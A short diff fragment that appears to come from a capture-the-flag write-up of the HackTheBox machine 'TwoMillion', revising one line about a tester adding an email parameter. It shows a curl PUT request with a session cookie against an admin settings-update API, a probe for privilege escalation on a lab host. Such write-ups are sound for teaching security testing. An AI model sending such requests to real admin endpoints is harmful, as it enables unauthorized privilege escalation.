TheLeopard65

 }

-• The tester then added the email parameter in the data of the PUT request but once again the tester was told that is_admin parameter is missing.
+• The tester then added the email parameter in the data of the PUT request.

 └─$ curl -X PUT http://2million.htb/api/v1/admin/settings/update --cookie "PHPSESSID=pg6a4v8pzabqupin2hte5fnces" --header "Content-Type: application/json" --data '{"email": "test@2million.htb"}' | jq